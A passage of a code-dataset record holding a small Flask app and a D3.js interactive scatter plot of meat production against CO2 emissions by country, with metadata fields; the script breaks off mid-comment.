'1','2','3','/',\n '+/-','0','.','='\n ]\n button_count = -1\n rows = 5\n\n # Button Frame\n button_frame = ttk.Frame(parent) \n s = ttk.Style()\n s.configure('TButton', font=('Arial', 14))\n\n # Grid management\n for i in range(rows):\n if i < 4:\n button_frame.columnconfigure(i, weight = 1)\n button_frame.rowconfigure(i, weight = 1)\n \n #Create button and save to list 'buttons'\n for i in range(5):\n for j in range(4):\n button_count += 1\n self.buttons.append(ttk.Button(button_frame, text= button_text[button_count]))\n self.buttons[button_count].grid(row = i, column = j, sticky='nsew', padx= 2, pady= 2)\n\n return button_frame\n\n\n\n def init_display(self):\n self.mainloop()\n\n\ndef main():\n view = View()\n view.init_display()\n view.button_trigger()\n\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.5168309807777405, "alphanum_fraction": 0.5202311873435974, "avg_line_length": 22.910568237304688, "blob_id": "509bdb35dddaafa76ecafc1bdb2814b511c59016", "content_id": "87073b993e8885f888bfe3e86bf997ff17096774", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2941, "license_type": "no_license", "max_line_length": 102, 
"num_lines": 123, "path": "/calculator/controller.py", "repo_name": "HoangNKQ/CalculatorApp", "src_encoding": "UTF-8", "text": "\nfrom view import View\n\nclass Controller:\n\n input_text = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '.', '(', ')', '+', '-', '*', '/']\n \n def __init__(self):\n self.view = View()\n\n self.is_new_expression = True\n self.is_result = False\n self.expression = ''\n self.result = ''\n\n self.setup_button()\n \n \n def setup_button(self):\n '''\n Assign command to all buttons \n '''\n for btn in self.view.buttons:\n btn['command'] = (lambda txt = btn['text'] : self.button_action(txt))\n\n\n\n def button_action(self, button_name):\n '''\n Perform function accordingly whenever a button is clicked\n '''\n # print(text)\n if button_name in self.input_text:\n self.input(button_name)\n\n if button_name == '=':\n self.equal()\n \n if button_name == 'C':\n self.clear_calculator()\n \n\n\n def input(self, button):\n '''\n Function performed when an input button is clicked\n '''\n if button not in ['+', '-', '*', '/']:\n self.save_expression(button)\n else:\n self.operator()\n self.save_expression(button)\n self.view.insert_expression(self.expression)\n\n\n def save_expression(self, text):\n '''\n Save input expression\n '''\n # print(self.new_expression)\n if self.is_new_expression:\n self.expression = text\n self.is_new_expression = False\n else:\n self.expression += text\n\n\n def operator(self):\n if self.is_result:\n self.expression = self.result\n self.is_new_expression = False\n self.is_result = False\n else:\n self.is_new_expression = False\n\n\n\n def equal(self):\n '''\n Function performed when equal button is clicked\n '''\n self.evaluate(self.expression)\n # self.view.insert_result(self.result)\n self.is_new_expression = True\n self.is_result = True\n\n\n def evaluate(self, expression):\n '''\n Calculate the result of entered expression\n '''\n try:\n self.result = str(eval(expression))\n self.view.insert_result(self.result)\n except SyntaxError:\n self.view.insert_result('Syntax Error')\n self.is_new_expression = True\n self.is_result = False\n\n\n\n\n def clear_calculator(self):\n '''\n Function performed when Clear button is clicked\n '''\n self.is_new_expression = True\n self.result = ''\n self.expression = ''\n self.view.insert_result(self.result)\n self.view.insert_expression(self.expression)\n\n\n def start_app(self):\n self.view.init_display()\n\n\ndef main():\n controller = Controller()\n controller.start_app() \n\n\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.7804877758026123, "alphanum_fraction": 0.7804877758026123, "avg_line_length": 40, "blob_id": "8d74bd7408d20174b83002243e6edd8b82f21b37", "content_id": "ed3534298cd428758d7a4e8367b03fe5d81e4f3d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 41, "license_type": "no_license", "max_line_length": 40, "num_lines": 1, "path": "/README.md", "repo_name": "HoangNKQ/CalculatorApp", "src_encoding": "UTF-8", "text": "## Calculator App with Tkinter using MVC\n" }, { "alpha_fraction": 0.5411764979362488, "alphanum_fraction": 0.5411764979362488, "avg_line_length": 14.545454978942871, "blob_id": "e75dc33097a4013eaf1149b8db9daee5713f0d3c", "content_id": "29b38a35e70cdfe260892367e1dccdfd7a497074", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 170, "license_type": "no_license", "max_line_length": 37, "num_lines": 11, "path": "/calculator/model.py", "repo_name": 
"HoangNKQ/CalculatorApp", "src_encoding": "UTF-8", "text": "class Model:\n def calculate(self, text):\n self.result = str(eval(text))\n return self.result\n\n\ndef main():\n pass\n\nif __name__ == '__main__':\n main()" } ]
4
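setup_button in the controller above binds each button's text through a lambda default argument (lambda txt=btn['text']: ...). That default is what keeps every callback distinct: closures in a loop capture the variable, not its value. A minimal sketch of the difference:

```python
labels = ["1", "2", "+"]

late = [lambda: lbl for lbl in labels]           # every lambda shares one 'lbl'
bound = [lambda lbl=lbl: lbl for lbl in labels]  # default arg freezes each value

print([f() for f in late])   # ['+', '+', '+']
print([f() for f in bound])  # ['1', '2', '+']
```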
HarsheetKakar/BC-dashboard
https://github.com/HarsheetKakar/BC-dashboard
c9d0c7c098082928304ee13ce920d5a5a614b40b
caff68486221b947918f138867d5a0c54115463e
96dd4a217baa3606c8f0147342a3dfc9fbdc5ddb
refs/heads/master
2020-04-05T07:52:00.727568
2018-11-08T10:46:04
2018-11-08T10:46:04
156,691,091
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6502242088317871, "alphanum_fraction": 0.6681614518165588, "avg_line_length": 20.299999237060547, "blob_id": "70a037275bf42748fdd449e101dfac37dae94935", "content_id": "72a063b06dba552359081d77324674dc23b00d4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 223, "license_type": "no_license", "max_line_length": 41, "num_lines": 10, "path": "/server.py", "repo_name": "HarsheetKakar/BC-dashboard", "src_encoding": "UTF-8", "text": "import dash\r\nimport dash_core_components as dcc\r\nimport dash_html_components as html\r\n\r\napp= dash.Dash(__name__)\r\n\r\napp.layout=html.Div('Hello World')\r\n\r\nif __name__==\"__main__\":\r\n app.run_server(debug=True, port=5000)\r\n" } ]
1
Hackman-git/Spectral-clustering
https://github.com/Hackman-git/Spectral-clustering
8596d9f42df861cc3c5e5c789526ee2e8244005e
f07064c86cf37493c10a8d08434e95ed178b2cc4
9f5b7ac674e67b4a1c683d681c5fdd3cb2a0f74b
refs/heads/master
2021-01-08T06:20:21.504043
2020-02-20T16:56:31
2020-02-20T16:56:31
241,939,333
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6545372009277344, "alphanum_fraction": 0.6863770484924316, "avg_line_length": 25.981595993041992, "blob_id": "a5fa81f817cf318e55adac8ffc872d245d4b3c69", "content_id": "50d67de8993c975ee2c2b6fd717cb3c1f155c27a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4397, "license_type": "no_license", "max_line_length": 112, "num_lines": 163, "path": "/SpectralClustering.py", "repo_name": "Hackman-git/Spectral-clustering", "src_encoding": "UTF-8", "text": "'''\nName: Olugbenga Abdulai\nCWID: A20447331\n'''\n\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport sklearn.cluster as cluster\nimport sklearn.neighbors as nbrs\nimport math\n\n'''\n3(a)\n'''\n# reading data\ndata = pd.read_csv(r\"C:\\Users\\abdul\\Desktop\\CS 584\\HW\\HW 2\\FourCircle.csv\")\n\n# scatterplot\nplt.figure(figsize=[8,8])\nsns.scatterplot(x=data['x'], y=data['y'], data=data)\nplt.show()\n\n'''\nThere are four clusters\n'''\n\n'''\n3(b)\n'''\ntrain_data = data[['x', 'y']]\nkmeans = cluster.KMeans(n_clusters=4, random_state=60616).fit(train_data)\ndata['kmean_cluster'] = kmeans.labels_\n\n# scatter plot\nplt.figure(figsize=[8,8])\nsns.scatterplot(x=data['x'], y=data['y'], hue=data.kmean_cluster)\nplt.show()\n\n# observations for each cluster\nfor i in range(4):\n print(\"\\ncluster label \", i)\n print(data.loc[data.kmean_cluster == i])\n\n'''\nThe kmeans algorithm separates cluster 0 and cluster 1 along the x-axis. i.e. cluster 0 has x-values\nranging roughly from 0-10 while cluster 1 has x-values ranging from -10 to 0. The algorithm separates cluster 2\nand cluster 3 along the y-axis with y-values for cluster 2 ranging roughly from 3-10 and y-values for cluster 3 \nranging from -3 to -10. 
The result is a cluster chart resembling a pie chart split in four segments.\n'''\n\n'''\n3(c)\n'''\n'''\nThis function prints the adjacency matrix, degree matrix, laplacian matrix and \nreturns the eigenvalues and eigenvectors from the laplacian matrix of spectral\nclustering analysis. Takes the number of neighbors as input\n'''\ndef eigenval_eigenvec(n):\n    knn = nbrs.NearestNeighbors(n_neighbors=n, algorithm=\"brute\", metric='euclidean')\n    knn_fit = knn.fit(train_data)\n    d, i = knn_fit.kneighbors(train_data)\n\n    # distances among observations\n    dist = nbrs.DistanceMetric.get_metric('euclidean')\n    distances = dist.pairwise(train_data)\n\n    # adjacency matrix\n    n_obs = data.shape[0]\n    adj = np.zeros((n_obs, n_obs))\n    for r in range(n_obs):\n        for j in i[r]:\n            adj[r, j] = math.exp(-(distances[r][j]) ** 2)\n\n    # making the adjacency matrix symmetric\n    adj = 0.5 * (adj + adj.transpose())\n    print(\"\\nadjacency matrix:\\n\", adj)\n\n    # Degree matrix\n    degree = np.zeros((n_obs, n_obs))\n    for j in range(n_obs):\n        s = 0\n        for k in range(n_obs):\n            s += adj[j, k]\n        degree[j, j] = s\n\n    print(\"\\ndegree matrix:\\n\", degree)\n\n    # Laplacian matrix\n    laplacian = degree - adj\n    print(\"\\nlaplacian matrix:\\n\", laplacian)\n\n    # eigenvalues and eigenvectors of laplacian matrix\n    from numpy import linalg as lin\n    evals, evecs = lin.eigh(laplacian)\n\n    print(\"\\nfirst eight eigenvalues with {} nearest neighbors: \\n\".format(n), evals[:8])\n    return (evals, evecs)\n\n# trying various values for number of neighbors\nfor j in range(1,16):\n    print(eigenval_eigenvec(j))\n\n'''\nFrom the eigenvalue analysis and our visual inspection that we require 4 clusters, we can see that\na minimum of 6 nearest neighbors is needed to correctly achieve 4 clusters. Let us confirm this with\nthe eigenvalue plot\n'''\ndef plot_eigen_values(evals):\n    # determining number of clusters with 7 smallest eigenvalues\n    seq = np.arange(1,8,1)\n    plt.figure(figsize=[8,8])\n    sns.scatterplot(x=seq, y=evals[0:7,])\n    plt.xticks(seq)\n    plt.grid('both')\n    plt.show()\n\nevals, evecs = eigenval_eigenvec(6)\nplot_eigen_values(evals)\n\n'''\n3(d)\n'''\n# with 6 nearest neighbors\nevals, evec = eigenval_eigenvec(6)\n\nprint('\\neigenvalues for 6 nearest neighbors: ', evals[:4])\n'''\nThere are four eigenvalues that are practically zero\nIn scientific notation, \n[-1.24369 x 10^-15, 1.4879 x 10^-16, 4.4804 x 10^-16, 2.9175 x 10^-15]\n'''\n\n'''\n3(e)\n'''\n# determining the 'practical' number of neighbors\n# plotting the first 20 eigenvals\nseq = np.arange(1,21,1)\nplt.figure(figsize=[8,8])\nsns.scatterplot(x=seq, y=evals[0:20,])\nplt.xticks(seq)\nplt.grid('both')\nplt.show()\n\n'''\nThe first 'jump' occurs at the 10th eigenvalue so we choose\n10 as our optimal number of nearest neighbors\n'''\nevals, evecs = eigenval_eigenvec(10)  # refresh the eigenvectors with 10 neighbors before clustering\nz = evecs[:, [0,1,2,3]]\n\n# 4-cluster k-mean on first four eigenvectors\nkmeans_spectral = cluster.KMeans(n_clusters=4, random_state=60616).fit(z)\ndata['spectral_cluster'] = kmeans_spectral.labels_\n\n# scatter plot\nplt.figure(figsize=[8,8])\nsns.scatterplot(x=data['x'], y=data['y'], hue=data['spectral_cluster'])\nplt.grid()\nplt.show()" }, { "alpha_fraction": 0.7861975431442261, "alphanum_fraction": 0.7963464260101318, "avg_line_length": 122.16666412353516, "blob_id": "db681138a631e0dc65091418f0125a6e30a1d193", "content_id": "d12a4ff39235c39063e59c6f0e41f3eb3001959f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1486, "license_type": "no_license", 
"max_line_length": 345, "num_lines": 12, "path": "/README.md", "repo_name": "Hackman-git/Spectral-clustering", "src_encoding": "UTF-8", "text": "# Spectral-clustering\nApply the Spectral Clustering method to the FourCircle.csv. Your input fields are x and y. Wherever needed, specify random_state = 60616 in calling the KMeans function.\n\na)\t(5 points) Plot y on the vertical axis versus x on the horizontal axis. How many clusters are there based on your visual inspection?\n\nb)\t(5 points) Apply the K-mean algorithm directly using your number of clusters that you think in (a). Regenerate the scatterplot using the K-mean cluster identifiers to control the color scheme. Please comment on this K-mean result.\n\nc)\t(10 points) Apply the nearest neighbor algorithm using the Euclidean distance. We will consider the number of neighbors from 1 to 15. What is the smallest number of neighbors that we should use to discover the clusters correctly? Remember that we may need to try a couple of values first and use the eigenvalue plot to validate our choice.\n\nd)\t(5 points) Using your choice of the number of neighbors in (c), calculate the Adjacency matrix, the Degree matrix, and finally the Laplacian matrix. How many eigenvalues do you determine are practically zero? Please display their calculated values in scientific notation.\n\ne)\t(10 points) Apply the K-mean algorithm on the eigenvectors that correspond to your “practically” zero eigenvalues. The number of clusters is the number of your “practically” zero eigenvalues. Regenerate the scatterplot using the K-mean cluster identifier to control the color scheme.\n" } ]
2
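The zero eigenvalues the script counts in part 3(d) are the standard signal: for an unnormalized graph Laplacian, the multiplicity of eigenvalue 0 equals the number of connected components. A toy numpy check on a graph of two disconnected pairs (unrelated to the FourCircle data):

```python
import numpy as np

# adjacency of two disconnected edges: {0,1} and {2,3}
adj = np.array([[0., 1., 0., 0.],
                [1., 0., 0., 0.],
                [0., 0., 0., 1.],
                [0., 0., 1., 0.]])
degree = np.diag(adj.sum(axis=1))
laplacian = degree - adj

evals, evecs = np.linalg.eigh(laplacian)
print(np.round(evals, 6))  # [0. 0. 2. 2.] -> two zero eigenvalues, two components
```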
marc-ashman/ios2droid
https://github.com/marc-ashman/ios2droid
8b9a1793943d5f185d2ad3a4565292a8460b8ec9
329f26a3cd8339a299e9eb32c8eaeb6354297e08
4642132601740fd79a2c6d7e6ad68dda89d55e3d
refs/heads/master
2015-08-13T19:03:58.872216
2014-10-03T07:43:41
2014-10-03T07:43:41
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6071428656578064, "alphanum_fraction": 0.6149396300315857, "avg_line_length": 28.6641788482666, "blob_id": "c2790dea38e81c2bd6cd751dc1eb5c6c7e3ab452", "content_id": "127a22d0b99ae1ce6c3c25d43f036558cf6aeac4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3976, "license_type": "no_license", "max_line_length": 89, "num_lines": 134, "path": "/ios2droid.py", "repo_name": "marc-ashman/ios2droid", "src_encoding": "UTF-8", "text": "from shutil import copyfile\nimport os\nimport re\n\n###\n# Class Def\n###\n\nclass Density:\n def __init__(self, name, sortorder, filepath, ios_str):\n self.name = name\n self.sortorder = sortorder\n self.filepath = filepath\n self.ios_str = ios_str\n def __repr__(self):\n return self.name\n\n###\n# Constants\n###\n\nXXXHDPI_PATH = \"res/drawable-xxxhdpi/\"\nXXHDPI_PATH = \"res/drawable-xxhdpi/\"\nXHDPI_PATH = \"res/drawable-xhdpi/\"\nHDPI_PATH = \"res/drawable-hdpi/\"\nMDPI_PATH = \"res/drawable-mdpi/\"\nLDPI_PATH = \"res/drawable-ldpi/\"\n\nXXXHDPI = Density(\"XXXHDPI\", 6, XXXHDPI_PATH, [\"@4x\"])\nXXHDPI = Density(\"XXHDPI\", 5, XXHDPI_PATH, [\"@3x\"])\nXHDPI = Density(\"XHDPI\", 4, XHDPI_PATH, [\"@2x\"])\nHDPI = Density(\"HDPI\", 3, HDPI_PATH, [\"@150x\", \"@1.5x\", \"@15x\"])\nMDPI = Density(\"MDPI\", 2, MDPI_PATH, [\"@1x\"])\nLDPI = Density(\"LDPI\", 1, LDPI_PATH, [\"@.75x\", \"@75x\"])\n\nDENSITIES = [ XXXHDPI, XXHDPI, XHDPI, HDPI, MDPI, LDPI ]\n\n###\n# Methods\n###\n\ndef remove_size_info(filename):\n newname = filename\n for density in DENSITIES:\n for str in density.ios_str:\n newname = newname.replace(str, \"\")\n return newname\n\ndef clean_filename(filename):\n file = remove_size_info(filename)\n file = file.replace(\"-\", \"_\")\n file = re.sub(r'[^a-z0-9_\\.]+', '', file.lower())\n return file\n \ndef add_to_dict_value_list(dict, key, item):\n if key in dict:\n dict[key].append(item)\n else:\n dict[key] = list()\n dict[key].append(item)\n \n###\n# Script\n###\n \n# used to record files and the found densities\nfound_files = dict()\nfiles_to_copy = list()\n\n# go through all files in the current directory, and process images\nfor file in os.listdir(\".\"):\n if file.endswith(\".png\") or file.endswith(\".jpg\") or file.endswith(\".gif\"):\n density_found = False\n for density in DENSITIES:\n for search_str in density.ios_str:\n if file.find(search_str) != -1:\n density_found = True\n files_to_copy.append((file, density.filepath + clean_filename(file)))\n add_to_dict_value_list(found_files, remove_size_info(file), density)\n break\n if not density_found:\n files_to_copy.append((file, MDPI.filepath + clean_filename(file)))\n add_to_dict_value_list(found_files, remove_size_info(file), MDPI)\n \n# get list of used densities and sort it\nused_densities = set()\nfor key, value in found_files.items():\n densities = set(value)\n used_densities = used_densities | densities\nsorted_used_densities = sorted(used_densities, key=lambda x: x.sortorder)\n\n# make folders of needed densities\nfor density in used_densities:\n if not os.path.exists(density.filepath):\n os.makedirs(density.filepath)\n \n# perform copying\nfor copy in files_to_copy:\n copyfile(copy[0], copy[1])\n\n# prepare formatting for report\nformat_str = '{0:40}'\nfirst_line = list()\nfirst_line.append('FILENAME')\nsecond_line = list()\nsecond_line.append('------------------')\nfor i in range(len(used_densities)):\n format_str += ' {' + str(i+1) + \":7}\"\n first_line.append(sorted_used_densities[i].name)\n 
second_line.append('----')\n \n# print report\nprint(format_str.format(*first_line))\nprint(format_str.format(*second_line))\nfor key in sorted(found_files.keys()):\n value = found_files[key]\n exists = dict()\n densities_for_file = set(value)\n densities_for_file = [x for x in densities_for_file if x in sorted_used_densities]\n \n # set default values to empty string\n for density in DENSITIES:\n exists[density] = \"\"\n \n # mark those found as density\n str_exists = list()\n for density in sorted_used_densities:\n if density in densities_for_file:\n str_exists.append(\"X\")\n else:\n str_exists.append(\"\")\n \n # Don't know python enough to write this in a better way\n print(format_str.format(key, *str_exists))\n\n" }, { "alpha_fraction": 0.6764518022537231, "alphanum_fraction": 0.6968730092048645, "avg_line_length": 22.388059616088867, "blob_id": "59364d36abc3f1b7a5382a49e2062d9f12e41c02", "content_id": "cfc511426823b5be0f41fcecf7a2d3b6f1c8cea3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1567, "license_type": "no_license", "max_line_length": 157, "num_lines": 67, "path": "/README.md", "repo_name": "marc-ashman/ios2droid", "src_encoding": "UTF-8", "text": "ios2droid\n=========\n\nIOS 2 Droid Drawable Organizer\n\n\nMany designers I work with often leave all mobile project assets in a single folder, and with ios image filename style (@2x, @3x, ...)\n\nBeing the lazy person I am, I got sick of renaming files and moving them in the right folders and made this. If your designers are like mine, enjoy the tool.\n\nWhat Will Happen\n================\n\n1. Dashes (-) will be replaced with underscores (_) \n2. Uppercase characters will be replaced with lowercase\n3. All invalid characters will be removed. No protection is provided to prevent overriding.\n4. Files will be copied to their corresponding folders:\n - @.75x or @75x -> res/drawable-ldpi/\n - @1x or no @_x in file name -> res/drawable-mdpi/\n - @1.5x, @15x or @150x -> res/drawable-hdpi/\n - @2x -> res/drawable-xhdpi/\n - @3x -> res/drawable-xxhdpi/\n - @4x -> res/drawable-xxxhdpi/\n\nExample\n=======\n\n**Input**\n<pre>\napp_logo.png\[email protected]\[email protected]\[email protected]\[email protected]\nbutton-bg.png\[email protected]\ninvalid-characters-$#[email protected]\ninvalid-characters-$#[email protected]\n</pre>\n\n**Output**\n<pre>\nres/\n drawable-mdpi/\n app_logo.png\n button-bg.png\n invalid_characters__inside.png\n drawable-hdpi/\n app_logo.png\n drawable-xhdpi/\n app_logo.png\n button_bg.png\n invalid_characters__inside.png\n drawable-xxhdpi/\n app_logo.png\n drawable-xxxhdpi/\n app_logo.png\n</pre>\n\nHow to Use\n==========\n\nPlace the script in the folder with all your ios named assets, and run:\n\npython ios2droid\n\nCopy the new res folder over to your project.\n" } ]
2
sscheele/simplex-algo
https://github.com/sscheele/simplex-algo
d3b61d1c619efacf832b2749f72e746303d2ac03
40ff8486053a5e030ea7036a9c378afca8790b40
fedec2b37ccfc254ddcce017e1fe4047d59aa329
refs/heads/master
2021-01-25T09:20:26.865550
2017-06-09T03:17:57
2017-06-09T03:17:57
93,814,247
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5511603355407715, "alphanum_fraction": 0.5901898741722107, "avg_line_length": 28.169231414794922, "blob_id": "212ed8d12b7456e0001d60b5f8ef377cbac207dc", "content_id": "336cb5eab0a9efa6ef44801915dfd3bad2c3731c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1896, "license_type": "no_license", "max_line_length": 88, "num_lines": 65, "path": "/main.py", "repo_name": "sscheele/simplex-algo", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport numpy as np\n\nnp.set_printoptions(suppress=True, linewidth=300)\n\n#the last n-1 rows are considered to be <=, the 0th is our optimization\nconstraint_matrix = np.array(\n [[13.0, 23.0, 0.0],\n [5.0, 15.0, 480.0],\n [4.0, 4.0, 160.0],\n [35.0, 20.0, 1190.0]]\n )\n\nfinal_col = constraint_matrix[:, -1]\nconstraint_matrix = constraint_matrix[:, :-1]\n\n#add in our slack variables\nfor i, _ in enumerate(constraint_matrix):\n tmp = []\n for _ in range(i):\n tmp.append(0)\n tmp.append(-1 if i == 0 else 1)\n for _ in range(len(constraint_matrix)-i-1):\n tmp.append(0)\n constraint_matrix = np.append(constraint_matrix, np.array([tmp]).T, axis=1)\n#print(final_col)\nconstraint_matrix = np.concatenate((constraint_matrix, np.array([final_col]).T), axis=1)\n\ndef findPivot():\n pvCol = -1\n for i in range(len(constraint_matrix[0])-1):\n if constraint_matrix[0][i] > 0:\n pvCol = i\n break\n if pvCol == -1:\n return -1, -1\n tmpMin = constraint_matrix[1][-1]/constraint_matrix[1][pvCol]\n pvRow = 1\n for i in range(1, len(constraint_matrix)):\n ratio = constraint_matrix[i][-1]/constraint_matrix[i][pvCol]\n if ratio < tmpMin:\n pvRow = i\n tmpMin = ratio\n return pvRow, pvCol\n\ndef performPivot(row, col):\n print(\"Pivoting on %d, %d\"%(row, col))\n #let c be a row resulting from solving for M[r][c]\n c = constraint_matrix[row]\n constraint_matrix[row] *= 1/c[col]\n c = (1/c[col])*c\n c *= [-1 for _ in range(1, len(c))] + [1]\n c[col] = -1\n print(c)\n for i, _ in enumerate(constraint_matrix):\n if i == row:\n continue\n constraint_matrix[i] += constraint_matrix[i][col]*c\n\nprint(constraint_matrix)\nr, c = findPivot()\nwhile r != -1 and c != -1:\n performPivot(r, c)\n r, c = findPivot()\n print(constraint_matrix)\n" } ]
1
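For comparison with performPivot above, the textbook tableau pivot normalizes the pivot row and then eliminates the pivot column from every other row by subtraction. A toy numpy sketch on an arbitrary 2x3 tableau (values chosen only for illustration):

```python
import numpy as np

T = np.array([[3., 2., 12.],
              [2., 1., 8.]])
r, c = 1, 0  # pivot row and column

T[r] /= T[r, c]                 # pivot element becomes 1
for i in range(len(T)):
    if i != r:
        T[i] -= T[i, c] * T[r]  # zero out the pivot column elsewhere
print(T)  # [[0.  0.5 0. ], [1.  0.5 4. ]]
```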
cloe5541/project-2
https://github.com/cloe5541/project-2
be11a562eb2f641de1e87d4725ca06356b98c74f
f9b2bef1a940cba5ada2f6a14f12d6e92a061530
16b1f822c6419f0c099a9c76891c03ffc48227e9
refs/heads/master
2022-04-23T07:11:47.610232
2020-04-26T23:32:23
2020-04-26T23:32:23
259,155,063
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6543535590171814, "alphanum_fraction": 0.6569920778274536, "avg_line_length": 17.950000762939453, "blob_id": "9d53e137c2fb94494bebf70028808502333a29c3", "content_id": "5fc7d328fbf8d0037b0866bea82e7f009ce8ec55", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 379, "license_type": "no_license", "max_line_length": 116, "num_lines": 20, "path": "/project-2-master/project-2-master/app.py", "repo_name": "cloe5541/project-2", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template\nimport csv\nimport pandas as pd\n\n\napp = Flask(__name__)\n\[email protected](\"/\")\ndef index():\n return render_template('index.html', bar_csv='static/cardio_top_yrs.csv', scatter_csv='static/meat_vs_co2.csv');\n\n\n\n\[email protected]('/meat_world')\ndef meat_world():\n return render_template('meat_world.html')\n\nif __name__ == \"__main__\":\n app.run()\n" }, { "alpha_fraction": 0.5023148059844971, "alphanum_fraction": 0.5188746452331543, "avg_line_length": 23.959999084472656, "blob_id": "975ba3eb403288b61b6af33149fbd4a51e7121ef", "content_id": "3e02efea6432fe208717a014fa1ae94432c6fadd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 5616, "license_type": "no_license", "max_line_length": 142, "num_lines": 225, "path": "/project-2-master/project-2-master/static/scatter_interactive.js", "repo_name": "cloe5541/project-2", "src_encoding": "UTF-8", "text": "// Bar chart 1\n\nvar width_s = document.getElementById('scatterPlot')\n .clientWidth;\nvar height_s = document.getElementById('scatterPlot')\n .clientHeight;\n\nvar margin = {\n top: 10,\n bottom: 70,\n left: 70,\n right: 20\n}\n\nvar svg_s = d3.select('#scatterPlot')\n .append('svg')\n .attr('width', width_s)\n .attr('height', height_s + 50)\n .append('g')\n .attr('transform', 'translate(' + margin.left + ',' + margin.top + ')');\n\nwidth_s = width_s - margin.left - margin.right;\nheight_s = height_s - margin.top - margin.bottom;\n\nvar data = {};\n\nvar x_scale_s = d3.scaleLinear()\n .range([0, width_s]);\n\nvar y_scale_s = d3.scaleLinear()\n .range([height_s, 0]);\n\nvar color_scale_s = d3.scaleLinear()\n .range(['lightgreen', 'darkgreen']);\n // .range(['#c0fa87', '#0a7d2c']);\n\nvar y_axis_s = d3.axisLeft(y_scale_s);\nvar x_axis_s = d3.axisBottom(x_scale_s);\n\nsvg_s.append('g')\n .attr('class', 'x axis_s')\n .attr('transform', 'translate(0,' + height_s + ')');\n\nsvg_s.append('g')\n .attr('class', 'y axis_s');\n\n\n// X axis label\n\nvar labelArea = 110;\nvar tPadBot = 40;\nvar labelMargin = 100;\n\nsvg_s.append(\"g\").attr(\"class\", \"xText_s\");\n\n// xText will allows ut to select the group without excess code\nvar xText_s = d3.select(\".xText_s\");\n\nfunction xTextRefresh_s(){\n xText_s.attr(\n \"transform\",\n \"translate(\" +\n (width_s / 2 - labelArea) +\n \", \" +\n (height_s + tPadBot) +\n \")\"\n )\n}\n\nxTextRefresh_s()\n\nxText_s\n .append(\"text\")\n .attr(\"y\", 0)\n .text(\"Meat production (million tonnes)\")\n\n// End x axis label\n\n\n// Y axis label\n\nvar labelArea = 100;\nvar leftTextX = -(margin.left * 0.8);\nvar leftTextY = height_s / 2 + labelArea;\n\nsvg_s.append(\"g\").attr(\"class\", \"yText_s\");\n\nvar yText_s = d3.select(\".yText_s\");\n\nfunction yTextRefresh_s(){\n yText_s.attr(\n \"transform\",\n `translate(${leftTextX}, ${leftTextY}) rotate(-90)`\n )\n}\n\nyTextRefresh_s();\n\nyText_s\n .append(\"text\")\n .attr(\"y\", 0)\n .text(\"CO2 Emissions (million 
tonnes)\")\n\n// End Y axis label\n\nall_csv_data_s = {}\n\nfunction draw_scatter(year) {\n\n var t = d3.transition()\n .duration(2000);\n\n csv_data = all_csv_data_s.filter(function(d) {\n return d.Year == year;\n });\n\n var max_x_value = d3.max(csv_data, function(d) {\n return +d.meat_production;\n });\n x_scale_s.domain([0, max_x_value]);\n\n var max_y_value = d3.max(csv_data, function(d) {\n return +d.Co2;\n });\n y_scale_s.domain([0, max_y_value]);\n color_scale_s.domain([0, max_y_value]);\n\n // Tooltips\n\n var toolTip = d3\n .tip()\n .attr(\"class\", \"d3-tip\")\n .html (function(d){\n var meat_prod = parseFloat(d.meat_production).toFixed(2);\n var co2 = parseFloat(d.Co2).toFixed(2);\n var theState = `<div>${d.Country}</div>`;\n var theY = `<div>CO2: ${co2}MT</div>`;\n var theX = `<div>Meat: ${meat_prod}MT</div>`;\n return theState + theX + theY;\n });\n\n svg_s.call(toolTip);\n\n\n var circles = svg_s.selectAll('circle')\n .data(csv_data)\n\n circles\n .exit()\n .remove();\n\n // Create Circles\n svg_s.selectAll(\"circle\")\n .data(csv_data)\n .enter()\n .append(\"circle\") // Add circle svg\n .attr(\"cx\", function(d) {\n return x_scale_s(d.meat_production); // Circle's X\n })\n .attr(\"cy\", function(d) { // Circle's Y\n return y_scale_s(d.Co2);\n })\n .attr('fill', function(d) {\n return color_scale_s(d.Co2);\n })\n .attr(\"r\", 5) // radius\n .on(\"mouseover\",function(d){\n toolTip.show(d,this);\n })\n .on(\"mouseout\", function(d){\n toolTip.hide(d)\n });\n\n // Update circles\n // svg_s.selectAll(\"circle\")\n // .data(csv_data) // Update with new data\n // .transition() // Transition from old to new\n // .duration(2000) // Length of animation\n // .each(\"start\", function() { // Start animation\n // d3.select(this) // 'this' means the current element\n // .attr(\"fill\", \"red\") // Change color\n // .attr(\"r\", 5); // Change size\n // })\n // // .delay(function(d, i) {\n // // return i / dataset.length * 500; // Dynamic delay (i.e. each item delays a little longer)\n // // })\n // //.ease(\"linear\") // Transition easing - default 'variable' (i.e. 
